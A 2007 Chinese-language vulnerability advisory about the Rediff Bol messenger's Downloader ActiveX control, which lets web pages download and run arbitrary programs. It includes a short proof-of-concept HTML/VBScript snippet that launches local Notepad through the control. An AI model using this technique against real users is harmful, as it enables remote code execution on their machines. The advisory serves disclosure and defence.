发布日期：2007-01-04
更新日期：2007-01-04

受影响系统：

Rediff Bol Downloader

描述：

---

BUGTRAQ  ID: 21831

Rediff Bol是一款即时通信工具。

Rediff Bol的Downloader控件在处理文件下载时存在漏洞，远程攻击者可能利用此漏洞在用户机器上执行任意命令。

Rediff Bol的Downloader控件允许任意网页下载并执行任意位置的程序而不会对其过滤，在IE中执行远程的程序时会报警，但在执行本地程序时不会有提示。

<*来源：Gregory R. Panakkal
  
  链接：http://www.infogreg.com/security/misc/rediff-bol-downloader-allows-downloading-and-spawning-arbitary
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Gregory R. Panakkal 提供了如下测试代码：

[OBJECT id="rboldwn" WIDTH=445 HEIGHT=40 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" codebase="http://imdownloads.rediff.com/newbol/Bol.CAB"]
[/OBJECT]

[script language="vbscript"]
rboldwn.url = "file://C:/WINNT/Notepad.exe"
rboldwn.fontsize = 14
rboldwn.barcolor = EE4E00
rboldwn.start = "start"
[/script]

建议：

---

厂商补丁：

Rediff
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://messenger.rediff.com/newbol/

浏览次数：2904
严重程度：0（网友投票）